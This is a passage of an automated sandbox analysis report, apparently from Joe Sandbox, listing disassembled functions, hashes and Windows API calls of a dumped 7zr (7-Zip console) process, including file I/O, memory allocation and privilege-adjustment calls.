                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrentMask
                            • String ID:
                            • API String ID: 1231390398-0
                            • Opcode ID: 098c2f30d620e281e3dcf64170f35c12354cfd32fff4cdee334f52c0c9af968b
                            • Instruction ID: 365811ed7b512231d5d90c6eea2c4bb6120c3d64883e249bdc590cf6fbd28a8b
                            • Opcode Fuzzy Hash: 098c2f30d620e281e3dcf64170f35c12354cfd32fff4cdee334f52c0c9af968b
                            • Instruction Fuzzy Hash: 92B012BA421340FFDF649FB0DD0CC163B2CEA063013005644F109C2110D636C045CF70
                            APIs
                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 00CAB843
                            • GetLastError.KERNEL32 ref: 00CAB8AA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLastmemcpy
                            • String ID:
                            • API String ID: 2523627151-0
                            • Opcode ID: ca35c46037ab7d339bb5c30c221c2fc331370032afd5aaf37518962630389b23
                            • Instruction ID: 6ca3d496c285bde1b338f5eff75696f9e84ba06a4a65e62a31df993246650f42
                            • Opcode Fuzzy Hash: ca35c46037ab7d339bb5c30c221c2fc331370032afd5aaf37518962630389b23
                            • Instruction Fuzzy Hash: 8F814D31A007069FDB64CF29C980A6AB7F6BF86318F144A2DE856C7A42D774FE41CB50
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 2436765578-0
                            • Opcode ID: 857d94e1f8e8be275c2a6556a44f9fa9dff3d92d781d707f77b65c846b741584
                            • Instruction ID: 1ba6bfd311b5a25a86c37986353b9b35de4f790a12a9627c0e939ae680af2e7c
                            • Opcode Fuzzy Hash: 857d94e1f8e8be275c2a6556a44f9fa9dff3d92d781d707f77b65c846b741584
                            • Instruction Fuzzy Hash: 90E0C23400438CAECF105FA0D8087983F689F023A9F04E015FC2C8E211C270C7D48760
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 746a79173352d779f195195b136a4f2da301ed20defb899985a97eecd199eb7b
                            • Instruction ID: f81bc08877dba4e932efe16f8da0895f0e865bf64ea2c16461ccf04ab518cf10
                            • Opcode Fuzzy Hash: 746a79173352d779f195195b136a4f2da301ed20defb899985a97eecd199eb7b
                            • Instruction Fuzzy Hash: FC52B130900289DFDF15CFA9C598BAEBBB5AF49304F28409DE815AB391CB75DE45CB21
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: ddd80d1ecd893698c4db7ad338a9f683683480913de1645d3b9ddea039f4b140
                            • Instruction ID: 5c1155d41f2aa18984d449ba9f22081d104f1d2c8b01205abba8168a17d11e99
                            • Opcode Fuzzy Hash: ddd80d1ecd893698c4db7ad338a9f683683480913de1645d3b9ddea039f4b140
                            • Instruction Fuzzy Hash: CEF19C71905785DFCF31CF64C490AEABBE1BF15304F58486EE4AA9B211DB34AE88CB51
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: dc9e36fc375d760161ba1f7c0416237cd91e0a35101bd379fbe596d21dbdb6f7
                            • Instruction ID: a79cd64e249b4485b5fd70b50d6ab5c7e9d81e0596e516e563193c25284483dc
                            • Opcode Fuzzy Hash: dc9e36fc375d760161ba1f7c0416237cd91e0a35101bd379fbe596d21dbdb6f7
                            • Instruction Fuzzy Hash: 6AD1AD70A04749EFDB64CFA5C880BEEBBF1BF48300F14452DEA6597661D770A944CB92
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CECF96
                              • Part of subcall function 00CF1511: __EH_prolog.LIBCMT ref: 00CF1516
                              • Part of subcall function 00CF1511: _CxxThrowException.MSVCRT(?,00D5D480), ref: 00CF1561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: 34da6ba8a50d0636ce3b3efbc859fb7f16525070e3053a66c257002334999d4b
                            • Instruction ID: feb2cb86d6c26943660e71e65864affe0c61550b7317b934a8346b69b3b7e316
                            • Opcode Fuzzy Hash: 34da6ba8a50d0636ce3b3efbc859fb7f16525070e3053a66c257002334999d4b
                            • Instruction Fuzzy Hash: 26515171900289DFCB11DFA9C8C8BAEBBB4BF49304F1844ADE85AD7242C7759E45DB21
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 12febb144ff1b9e6b7603905eb7978d0a0f87cacd8409e82525900ce92459a6e
                            • Instruction ID: 0e9cfb7a42126be6a581a50b697cf6ab996d00f9563d94dba6740aa413c7cabd
                            • Opcode Fuzzy Hash: 12febb144ff1b9e6b7603905eb7978d0a0f87cacd8409e82525900ce92459a6e
                            • Instruction Fuzzy Hash: A2515D74A00606DFCB14CF64C8909BAFBB2FF4A304B14496ED6979B751D331AA06DF91
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 6180403cab2185c4f866d7147a2c7716d5d0dfaa636b56e56158e720c69b4637
                            • Instruction ID: c313e9eaf2632382106e760317c03eab19afcd2a5b7bd4385657bf47d1a2b439
                            • Opcode Fuzzy Hash: 6180403cab2185c4f866d7147a2c7716d5d0dfaa636b56e56158e720c69b4637
                            • Instruction Fuzzy Hash: 4141A070A00786EFDB24CF56C884B6ABBB0BF44310F148A6DE46697691C370FE91CB51
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB4255
                              • Part of subcall function 00CB440B: __EH_prolog.LIBCMT ref: 00CB4410
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            • Opcode ID: 1eec7fc765826e966f36a2ca5535a0a847f824d32ba735d0bc06be7b6178b5c3
                            • Instruction ID: 6cf3c0852983315884b98f783381d0041aac0b0912d1d9ac591485222c521ef6
                            • Opcode Fuzzy Hash: 1eec7fc765826e966f36a2ca5535a0a847f824d32ba735d0bc06be7b6178b5c3
                            • Instruction Fuzzy Hash: 0451C4B0805788CFC725DF69C1846CAFBF0BF19304F5588AEC49A97752D7B0A648DB61
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CCD0E6
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrowmalloc
                            • String ID:
                            • API String ID: 3978722251-0
                            • Opcode ID: 0364cce56d44279004819d6408548c7d1a986a3791ef9549d330d6da7ec4037f
                            • Instruction ID: 9878cb83400a8ea9c2bf0065e4449f9acebdffd623af72d8bc39f27cc6220a08
                            • Opcode Fuzzy Hash: 0364cce56d44279004819d6408548c7d1a986a3791ef9549d330d6da7ec4037f
                            • Instruction Fuzzy Hash: 2A41C771A002159FCB10DFA8C844BAEBBB4BF45324F1845ADE456E7281CB70DE41C7A1
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB7FCA
                              • Part of subcall function 00CA950D: SysAllocStringLen.OLEAUT32(?,?), ref: 00CA952C
                              • Part of subcall function 00CA950D: _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CA954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionH_prologStringThrow
                            • String ID:
                            • API String ID: 1940201546-0
                            • Opcode ID: ff308258e6d86c566f184f0cf9a9d7f8620b41ce9f9d25ca16280ea1c036de0a
                            • Instruction ID: d1bb36c38480f4145ab25fecfcae8da3b685599ce1cc7bf31a47bd8e0e025aea
                            • Opcode Fuzzy Hash: ff308258e6d86c566f184f0cf9a9d7f8620b41ce9f9d25ca16280ea1c036de0a
                            • Instruction Fuzzy Hash: 3C31507282010A9ACF15BFA5E892DFE7778FF25394F44412AE022B7162DE359A0CD751
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CDADBC
                              • Part of subcall function 00CDAD29: __EH_prolog.LIBCMT ref: 00CDAD2E
                              • Part of subcall function 00CDAF2D: __EH_prolog.LIBCMT ref: 00CDAF32
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 107d949f7c341e2d9098fa9f7ea27348148fe633805f5124ac0d3b8bf36bb95c
                            • Instruction ID: 57f7c5eed6146c00e8f9efd1e8cc5fe3c9fa55ab89641e98aaea763d4ca8d5c9
                            • Opcode Fuzzy Hash: 107d949f7c341e2d9098fa9f7ea27348148fe633805f5124ac0d3b8bf36bb95c
                            • Instruction Fuzzy Hash: 3441BA7144ABC0DEC326DF7881656C6FFE06F26204F94C99EC4EA43B52D670A60CD766
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: b763030d1fe9cc39696827a4d0742bdc12bf8587dc316b27f6df34c193d51131
                            • Instruction ID: de08fdb3e51d338489254ae0338312dff3e7add29a9bd2e8226f47bee9270037
                            • Opcode Fuzzy Hash: b763030d1fe9cc39696827a4d0742bdc12bf8587dc316b27f6df34c193d51131
                            • Instruction Fuzzy Hash: 9B31F6B0900609DBCB14EF95C891DAEFBB5FF94364B20811EE82667251C7309A01CBA0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC98F7
                              • Part of subcall function 00CC9987: __EH_prolog.LIBCMT ref: 00CC998C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                             • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 5d0faf52dfc75ca3e2f64d6625a08807a88bc213cad9dcc4c8ba9bbb2c495fea
                            • Instruction ID: 56753fb0e7d6a11e5fb42c5c28e1f8323e72a86dd4db728c1bdf2a788a3d9b95
                            • Opcode Fuzzy Hash: 5d0faf52dfc75ca3e2f64d6625a08807a88bc213cad9dcc4c8ba9bbb2c495fea
                            • Instruction Fuzzy Hash: 80114C356002459FDB14CF59C888FAAB3A9FF89350F14855CE86ADB261CB31E900CB60
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC021F
                              • Part of subcall function 00CB3D66: __EH_prolog.LIBCMT ref: 00CB3D6B
                              • Part of subcall function 00CB3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D7D
                              • Part of subcall function 00CB3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D94
                              • Part of subcall function 00CB3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00CB3DB6
                              • Part of subcall function 00CB3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DCB
                              • Part of subcall function 00CB3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DD5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID:
                            • API String ID: 1532160333-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC1C74
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB7E5F
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                              • Part of subcall function 00CA757D: GetLastError.KERNEL32(00CAD14C), ref: 00CA757D
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID:
                            • API String ID: 683690243-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CEBF91
                              • Part of subcall function 00CED144: __EH_prolog.LIBCMT ref: 00CED149
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CEBDBA
                              • Part of subcall function 00CEBE69: __EH_prolog.LIBCMT ref: 00CEBE6E
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00CA1AD1,00000000,00000002,00000002,?,00CA7B3E,?,00000000), ref: 00CA7AFD
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CDC0B8
                              • Part of subcall function 00CC7193: __EH_prolog.LIBCMT ref: 00CC7198
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE0364
                              • Part of subcall function 00CE01C4: __EH_prolog.LIBCMT ref: 00CE01C9
                              • Part of subcall function 00CE0143: __EH_prolog.LIBCMT ref: 00CE0148
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                              • Part of subcall function 00CE03D8: __EH_prolog.LIBCMT ref: 00CE03DD
                              • Part of subcall function 00CE004A: __EH_prolog.LIBCMT ref: 00CE004F
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            APIs
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE550A
                              • Part of subcall function 00CE4E8A: __EH_prolog.LIBCMT ref: 00CE4E8F
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE5E30
                              • Part of subcall function 00CE08B6: __aulldiv.LIBCMT ref: 00CE093F
                              • Part of subcall function 00CBDFC9: __EH_prolog.LIBCMT ref: 00CBDFCE
                            Similarity
                            • API ID: H_prolog$__aulldiv
                            • String ID:
                            • API String ID: 604474441-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE8ED6
                              • Part of subcall function 00CE9267: __EH_prolog.LIBCMT ref: 00CE926C
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00CA7C8B
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CEBE6E
                              • Part of subcall function 00CE5E2B: __EH_prolog.LIBCMT ref: 00CE5E30
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CDF74A
                              • Part of subcall function 00CDF784: __EH_prolog.LIBCMT ref: 00CDF789
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            APIs
                            • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,00CA785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00CA7B65
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CF80AF
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                              • Part of subcall function 00CEBDB5: __EH_prolog.LIBCMT ref: 00CEBDBA
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            APIs
                            • FindClose.KERNELBASE(00000000,?,00CA6880), ref: 00CA6853
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            APIs
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            APIs
                            Similarity
                            • API ID: fputc
                            • String ID:
                            • API String ID: 1992160199-0
                            APIs
                            • SetFileTime.KERNELBASE(?,?,?,?,00CA7C65,00000000,00000000,?,00CAF238,?,?,?,?), ref: 00CA7C49
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            APIs
                            • SetEndOfFile.KERNELBASE(?,00CA7D81,?,?,?), ref: 00CA7D3E
                            Similarity
                            • API ID: File
                            • String ID:
                            • API String ID: 749574446-0
                            APIs
                            Similarity
                            • API ID: memmove
                            • String ID:
                            • API String ID: 2162964266-0
                            APIs
                            • CloseHandle.KERNELBASE(00000000,00000000,00CB3D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3E12
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            APIs
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,00CA75AF,00000002,?,00000000,00000000), ref: 00CA7657
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000), ref: 00D26B31
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            APIs
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            APIs
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            APIs
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D26BAC
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            APIs
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            APIs
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            APIs
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            APIs
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            APIs
                            • memcmp.MSVCRT(?,00D548A0,00000010), ref: 00CAC09E
                            • memcmp.MSVCRT(?,00D50258,00000010), ref: 00CAC0BB
                            • memcmp.MSVCRT(?,00D50348,00000010), ref: 00CAC0CE
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            APIs
                            Strings
                            Similarity
                            • API ID: H_prolog
                            • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                            • API String ID: 3519838083-1909666238
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA64F8
                            • GetCurrentThreadId.KERNEL32 ref: 00CA6508
                            • GetTickCount.KERNEL32 ref: 00CA6513
                            • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00CA651E
